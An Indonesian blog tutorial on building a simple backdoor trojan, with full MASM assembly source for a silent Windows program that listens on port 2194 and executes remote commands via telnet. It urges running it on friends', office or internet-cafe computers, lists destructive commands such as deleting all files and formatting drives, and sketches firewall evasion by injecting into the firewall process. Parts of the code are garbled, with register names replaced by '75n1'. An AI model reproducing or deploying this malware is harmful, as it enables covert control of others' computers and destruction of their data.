Backdoor Sederhana

chmood
Sobat udah tahu belum backdoor?, kali ini kami akan membahas tentang backdoor dan cara membuatnya.


Apa itu backdoor?



Backdoor termasuk salah satu golongan malware atau program berbahaya, kenapa dikatakan berbahaya?, karena dengan backdoor seorang hacker bisa mengendalikan komputer, bisa meremote dari jauh, mencuri data berharga seperti password, pin, data finansial perusahaan bahkan untuk aksi yang fatal, misal: memformat hardisk!.



Cara kerja backdoor



Sesuai namanya cara kerja backdoor cukup sederhana, yaitu dengan cara membukakan pintu belakang dan yang pasti secara diam-diam, pintunya biasanya berupa port, backdoor akan menanti si pembuat backdoor tersebut datang (menghubunginya). Apabila sang pembuat backdoor datang maka backdoor akan membukakan pintu lalu mempersilahkannya masuk dan melindunginya dari pengawasan keamanan, tentu setelah itu hacker (si pembuat backdoor) dapat melakukan apa saja yang dia inginkan dengan leluasa. sangat mengerikan!!



Sebelum kita memulai experimen ini, sebaiknya kita pelajari dulu teorinya.



Dalam pemrograman jaringan biasanya dibutuhkan yang namanya socket, socket disini maksudnya bukan socket pada jenis-jenis prosesor kayak socket-A, socket 393 atau socket AM2, tapi socket sebagai obyek untuk melakukan pertukaran data (packet) secara byte per byte. begitu juga backdoor, dia juga membutuhkan socket untuk mewujudkan komunikasi. bagi para programmer jaringan, saya yakin pasti dah tahu teori dan cara kerja backdoor ini.



Pada pembuatan backdoor kita harus membuat dua socket, kenapa dua? karena socket tersebut adalah penghubung, misal jika kita ingin ngobrol jarak jauh kita harus pake telpon, si A menelpon si B, maka socket itu bisa kita asumsikan sebagai telpon, dan tidak mungkin komunikasi akan terjadi apabila telponnya cuma satu (cuma si A yang punya telpon), begitu juga dengan socket harus ada dua, yang satu untuk backdoor (server) dan satunya lagi untuk si pembuat backdoor (client).



.data?



sock1 SOCKET ? ; socket pertama [ backdoor ]



sock2 SOCKET ? ; socket kedua [ attacker ]



Setelah itu kita butuh yang namanya port, apa itu port?, berdasarkan wujudnya port dibagikan menjadi dua jenis, port fisik dan port logika, port fisik itu yang bisa kita lihat langsung di belakang komputer, kayak COM1, COM2, USB dll. kalo port logika itu bisa banyak banget, bisa sampai ribuan dan nggak bisa kita lihat, nah port yang akan kita gunakan disini adalah port logika, kalo tadi socket bagaikan telpon maka port bagaikan kabelnya dan IP address bagaikan nomor telponnya, tanpa itu semua komunikasi mustahil terjadi.



Setelah socket tercipta kita akan tentukan port yang akan kita gunakan sebagai jalur komunikasi, pilih port yang masih kosong atau belum kepake, contoh di program ini saya gunakan port 2194. untuk memasang portnya kita harus terlebih dahulu mengisi variabel pada struktur sockaddr_in yang memiliki rangkaian :



sockaddr_in STRUCT



sin_family WORD ?



sin_port WORD ?
sin_addr in_addr <>



sin_zero BYTE 8 dup (?)


sockaddr_in ENDS


diisi dengan cara :



push 2194 ; nomor port yang akan dibuka backdoor



call htons


mov sockaddr_in.sin_port,eax


Setelah struktur sockaddr_in diisi maka langkah selanjutnya adalah binding :



push sizeof sockaddr_in ; Besar struktur soackaddr_in



push offset sockin1 ; alamat sockaddr_in 1



push sock1



call bind ; binding



cmp eax,SOCKET_ERROR ; socket error



jnz socket_oke ; udah ada atau port udah digunakan



xor eax,eax ; null



ret



socket_oke:



mov eax,1



ret



agar lebih jelas lihat source code lengkapnya di bawah ini :



===================[ POTONG DISINI ]===================




; SIMPEL BACKDOOR TROJAN





; compile with MASM





; ml /c /coff backdoor.asm




; link /subsystem:windows /opt:noref backdoor.obj



;==================================================





.386 ; 32 bit





.model flat,stdcall





option casemap:none





include \masm32\include\windows.inc





include \masm32\include\user32.inc






include \masm32\include\wsock32.inc





include \masm32\include\kernel32.inc





include \masm32\include\winmm.inc





include \masm32\include\shell32.inc





includelib \masm32\lib\user32.lib





includelib \masm32\lib\wsock32.lib






includelib \masm32\lib\kernel32.lib





includelib \masm32\lib\winmm.lib





includelib \masm32\lib\shell32.lib





.data? ; .data section





sock1 SOCKET ? ; socket pertama





sock2 SOCKET ? ; socket kedua






sockin1 sockaddr_in <> ; struktur





sockin2 sockaddr_in <>





s2IP dd ?





wsad WSADATA <> ; WSA struktur






hFile dd ?





hBW dd ?





lenn dd ?





.data





AppName db "AnShell",0





szKonek db "Connected : ",0






szLogon db 13,10





db "______________________________________________",13,10





db " __, WELCOME TO : ",13,10





db "Keterangan",13,10





db "Keterangan",13,10





db "Keterangan",13,10






db 13,10





db "Hanya Untuk Menambah Wawasan",13,10





db "______________________________________________",13,10





db 0





szMasuk db "[ You already entered system ]",13,10





szPerintah db "Command : ",0






szSelesai db 13,10," - thanks for visiting",13,10





db " - [4NV|e]",13,10





db " - [email protected]",13,10





db " - www.anvie.net.tc",0





szSocketError db "shit, socket error",0 ;what the fuck!





szPerintahX db "Command not found.",13,10,0






szKosong db 13,10





szOpen db "Open",0





; perintah-perintah





Perintah1 db "msgbox",0





Perintah2 db "close",0





Perintah3 db "shell",0






Buffer db 512 dup(0) ; buffer





Buffer2 db 512 dup(0) ; buffer





KeepOF dd 0 ; buat jaga-jaga biar gak terjadi buffer overflow





.code ; .code section





; «««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««





StartUp proc ; prosedur awal pembuatan socket






push offset wsad





push 0101h





call WSAStartup





push 0





push SOCK_STREAM





push PF_INET






call socket ; buat socket utama (server? :P)





; backdoor!





mov sock1,eax





mov ax,AF_INET





mov sockin1.sin_family,ax





xor eax,eax






mov sockin1.sin_addr,eax





push 2194





call htons ; Buka port 2194 (Lucky Number ;)





mov sockin1.sin_port,ax ; masukin port ke struktur sockaddr_in




mov eax,sizeof sockaddr_in





push eax






push offset sockin1





push sock1





call bind





cmp eax,SOCKET_ERROR ; apakah socket oke ?





jnz socket_oke





xor eax,eax ; tidak, return 0






ret





socket_oke: ; oke, yeah return 1





mov eax,1





ret





StartUp endp





; «««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««






BersihkanBuffer proc uses edi lpBufferWORD,jmlWORD





xor al,al ; Isi buffer jadikan nul byte





mov edi,lpBuffer ; dibutuhkan di lingkungan assembly





mov ecx,jml





rep stosb ; mnemonik stosb mengeset alamat edi





; dengan nilai dari eax






ret





BersihkanBuffer endp





; «««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««





Tarjim proc lpCommandWORD ; prosedur untuk menerjemahkan perintah





LOCAL lBuffer[512]:BYTE ; untuk dieksekusi.





LOCAL argWORD






LOCAL arg2WORD





push lpCommand





call lstrlen





cmp eax,2





jne perintah_ok





ret






perintah_ok:





lea edi,lBuffer





push edi ; selamatkan edi ke stack





;





push 512





push edi ; bersihkan lBuffer






call BersihkanBuffer





mov edi,lpCommand





mov al,020h ; cari byte 20h dimana 20h=karakter spasi





mov ecx,512 ; simpel deteksi argumen





repnz scasb ; cari!





dec edi






test ecx,ecx ; apakah karakter spasi ditemukan?





jnz cmd_ok ; jika ya goto cmd_ok





mov edi,lpCommand





mov al,0dh ; jika tidak, cari karakter enter (0dh/13)





mov ecx,512





repnz scasb






dec edi





mov byte ptr [edi],0 ; jika ketemu set null byte





jmp no_arg ; argumen tidak ada goto no_arg





cmd_ok:





mov byte ptr [edi],0 ; nullkan karakter spasi





inc edi






mov arg,edi ; simpan argumen pertama





push edi





call lstrlen





add edi,eax





sub edi,2 ; nullkan 2 byte terkahir maksud 2 byte terakhir





mov word ptr [edi],00 ; disini adalah 0ah 0dh (enter)






no_arg:





pop edi ; kembalikan edi dari stack





push lpCommand





push edi





call lstrcpy ; kopikan string perintah ke buffer





push offset Perintah1






push edi





call lstrcmpi ; compare string insensitive





or eax,eax





jz msgbox ; apakah perintah msgbox ?





push offset Perintah2





push edi






call lstrcmpi





or eax,eax ; apakah perintah close ?





jz mati





push offset Perintah3





push edi





call lstrcmpi






or eax,eax ; apakah perintah shell ?





jz shell





xor eax,eax ; perintah gak ada yang cocok





ret ; kembali dan tampilkan pesan





msgbox:





mov eax,MB_OK






or eax,MB_SYSTEMMODAL





or eax,MB_TOPMOST





push eax





push offset AppName





push arg





push 0






call MessageBox





jmp retCmd





mati:





push offset szSelesai





call lstrlen





mov lenn,eax






; tampilkan pesan selesai





push 0





push lenn





push offset szSelesai





push sock2





call send






; tutup socket





push sock1





call closesocket





push sock2





call closesocket





; bersihkan memori






call WSACleanup





xor eax,eax





push 0





call ExitProcess





shell:





; cari untuk argumen ke 2 atau sub commandline






mov arg2,0





mov edi,arg





mov ecx,512





mov al,20h ; 20h = spasi





repnz scasb





cmp ecx,0 ; spasi ditemukan ?






je no_arg2 ; jika tidak goto no_arg2





dec edi





mov byte ptr [edi],0 ; ada, nullkan





inc edi





mov arg2,edi ; simpan arg2 ke memori





no_arg2:






push 1





push 0





push arg2





push arg





push offset szOpen





push 0






call ShellExecuteA ; eksekusi!





jmp retCmd





retCmd:





mov al,1





ret





Tarjim endp






««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««



start:



call StartUp ; panggil prosedur startup



test eax,eax ; apakah socket oke?



jz socket_error ; jika tidak socket = error



; socket dah oke



; buat listening ke port 2194



push 1



push sock1



call listen



new_session:



push sock2 ; tutup socket 2



call closesocket ; berfungsi setelah looping



mov eax,sizeof sockaddr_in



mov lenn,eax
push offset lenn



push offset sockin2



push sock1



call accept ; menunggu perintah dari socket 2



mov sock2,eax ; simpan alamat socket 2



push offset szLogon



call lstrlen



mov lenn,eax



push 0



push lenn



push offset szLogon



push sock2



call send ; sambut tamu dari luar



mov eax,sockin2.sin_addr



push eax



call inet_ntoa ; terjemahkan IP x.x.x.x


mov s2IP,eax ; simpan IP dari socket 2


push offset szKonek



push offset Buffer



call lstrcpy



lea 75n1,Buffer



push 75n1



or ecx,-1



mov al,03Ah ; cari karakter ':'



repnz scasb


inc 
75n1

; tempelkan string IP


push s2IP



push 75n1



call lstrcpy



push 75n1



call lstrlen



add 75n1,eax



mov word ptr [75n1],0a0dh ; ganti baris


add 
75n1,2




mov byte ptr [75n1],0 ; null





pop 75n1





push 75n1





call lstrlen






mov lenn,eax





push 0





push lenn





push offset Buffer





push sock2





call send ; tampilkan string Connected : x.x.x.x -> IP address






push 0





mov eax, sizeof szMasuk





push eax





push offset szMasuk





push sock2





call send ; welcome






perintah:





push 0





push 10





push offset szPerintah





push sock2





call send ; backdoor siap dikendalikan!






push 512





push offset Buffer2





call BersihkanBuffer ; Bersihkan buffer





lea edi,Buffer2





mov KeepOF,0 ; counter anti buffer overflow





tunggu_perintah:






invoke recv,sock2,edi,500,0





test eax,eax





jz new_session





cmp eax,SOCKET_ERROR





je new_session





add 75n1,eax






inc KeepOF





cmp KeepOF,511





jb no_of ; jika penuisan buffer hampir mencapai 512 byte





jmp perintah ; bersihkan buffer, jaga2 biar gak terjadi





no_of: ; Buffer overflow :-)





cmp byte ptr [75n1-1],08h






jne bkn_backs





xor eax,eax





mov word ptr [75n1],ax





sub 75n1,2





bkn_backs:





cmp byte ptr [75n1-1],0ah ; apakah tombol enter yang ditekan ?






jnz tunggu_perintah ; jika nggak masih nunggu perintah





; ya, terjemahkan perintah





push offset Buffer2





call Tarjim ; panggil prosedur tarjim





test eax,eax ; apakah perintah valid





jnz perintah ; jika tidak balik tungu perintah






cmp eax,2 ; apakah perintah kosong ?





je kosong ; jika ya, goto kosong





push 0





mov eax,sizeof szPerintahX





push eax





push offset szPerintahX






push sock2





call send ; tampilkan pesan kalo perintah nggak ada





jmp perintah





kosong:





push 0





push 2






push offset szKosong





push sock2





call send ; hanya ganti baris





jmp perintah





socket_error: ; trap handel jika-jika socket error





push MB_ICONERROR






push offset AppName





push offset szSocketError





push 0





call MessageBox ; tampilkan kesalahan





tamat:





push 0






call ExitProcess ; selesai.





end start



================[ EOF ]================
kalo udah coba test hasilnya, jalankan backdoor.exe dikomputer target, misal komputer teman, kantor, warnet (komputer operator lho) atau komputer pribadi, backdoor ini saya desain silent jadi kamu gak bakalan nemuin jendela macam-macam, tapi kalo kamu pake firewall pasti akan ketahuan kalo backdoor.exe telah membuka port.



setelah langkah diatas selesai kita akan melakukan telnet ke komputer target, kita bisa pake komputer lain, untuk menjalankan telnet caranya klik start>run> ketik “cmd” tanpa tanda kutip. setelah itu akan tampil jendela konsol seperti gambar 01:





Gambar 01



pada jendela konsol ketikkan “telnet x.x.x.x 2194” tanpa tanda kutip, x.x.x.x disini maksudnya IP target, contoh “telnet 192.168.0.3 2194”, 2194 disini maksudnya port yang akan kita masuki (untuk contoh backdoor ini aku gunakan port 2194). contoh Gambar 02



Gambar 02



tekan “Enter” kalo telnet berhasil maka akan tampil seperti Gambar 03 berikut:





Gambar 03



nah kalo dah gitu kita udah bisa mengendalikan komputer target dari jarak jauh, maksud seperti contoh gambar diatas adalah backdoor sudah siap melakukan perintah, ada 3 perintah yang dikenal oleh backdoor ini :



1. Tulis "msgbox" (untuk menampilkan pesan ke komputer target)



2. Tulis "shell" (untuk menjalankan aplikasi di komputer sasaran)



3. Tulis "close" (untuk menutup hubungan dan mematikan backdoornya)



perintah diatas bisa ditambah sendiri tergantung kreatifitas kamu.



backdoor bisa menyenangkan jika digunakan untuk mengerjai temen yang lagi ol .



cara menjalankan perintah cukup ketikkan perintah diatas pada jendela konsol, misal kita akan menampilkan pesan ke komputer target, tinggal ketikkan:



“msgbox hallo, komputer kamu dibawah kendaliku” tanpa tanda kutip, maka pada komputer target akan muncul jendela box seperti contoh Gambar 04:






Gambar 04



atau ingin memainkan musik ke komputer target dengan catatan kita tahu tempat musik yang akan kita mainkan, contoh:



“shell d:\musik ku\dream theater – endless sacrifice.mp3”



maka dikomputer target akan memainkan musik yang merdu.



atau ingin mematikan komputer target yang berbasis Wind**s 2000 keatas, dengan cara:



“shell shutdown –s –t 0 –f”



untuk merestart tinggal ganti “-s” jadi –“r” contoh:



“shell shutdown –r –t 0 –f”



Backdoor bisa menjadi sangat berbahaya jika yang dijalankan adalah perintah-perintah seperti:



“shell del /f /q /s c:\*.*” (perintah untuk menghapus semua data tanpa konfirmasi)



“shell format d: /q” (perintah untuk memformat hardisk)



NB: mohon agar contoh program backdoor ini tidak digunakan untuk tindakan-tindakan yang merusak, hanya untuk pembelajaran.



setelah selesai menggunakan backdoor kita bisa tutup dengan mengetikkan perintah “close”, maka backdoor di komputer target akan bunuh diri.



Cara di atas akan sia-sia apabila komputer target memasang firewall, kita perlu menambahkan kode anti firewall detection untuk menghindari deteksi dari firewall. kode anti firewall detection yang saya ketahui adalah dengan cara tehnik runtime process infection, dimana kita akan menginjeksi kode backdoor ke tubuh firewall (hampir mirip kayak DLL injection) yang sedang resident lalu meremote-nya misal pake API CreateRemoteThread, sehingga firewall akan mengangapnya sebagai sumber yang dipercaya, karena nggak mungkin firewall mencurigai dirinya sendiri sebagai backdoor :”D, Adapun beberapa firewall yang vulnerable terhadap serangan ini adalah:



1. Zone Alarm 4



2. Zone Alarm Pro 4



3. BlackIce 3.
Komentar